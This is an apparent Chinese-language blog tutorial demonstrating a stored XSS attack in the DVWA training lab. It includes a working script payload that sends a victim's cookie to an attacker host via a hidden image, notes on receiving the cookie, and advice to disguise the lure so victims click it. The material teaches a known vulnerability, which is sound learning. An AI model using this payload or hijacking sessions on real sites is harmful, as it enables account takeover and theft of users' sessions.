Young87

当前位置:首页 >个人收藏

实例演示——————简单演示XSS store攻击,便于学习理解XSS store

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。
一,环境搭建
     1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。
     2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者点开激活代码)
     3,接收cookie代码准备。(此次代码放在攻击者主机192.168.98.170上)




二,实例演示XSS store

     1,如图,受害者(192.168.98.168)正在登陆DVWA


     2,攻击者再存在XSS漏洞页面留言:<script>document.write('<img src="http://192.168.98.170/getcookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script>    //为了演示,alert(/XSS/)</script>是加上去看效果的


     3,受害者浏览存在XSS漏洞页面,触发代码执行,本地cookie被盗取


     4,查看接收cookie代码getcookie.php是否生成cookie.txt文本文件,是则接收到cookie并存储于其中。


     5,攻击者利用工具,修改cookie登陆DVWA,获得受害者一样的管理员权限。







三,总结
    此次简单的演示,便于初步认识XSS store。可以发挥想象你就清楚XSS store的危害以及为何XSS会位列OWASP TOP 10.

除特别声明,本站所有文章均为原创,如需转载请以超级链接形式注明出处:SmartCat's Blog

上一篇: shell变量赋值与环境

下一篇: java将byte[]转成文件的问题

精华推荐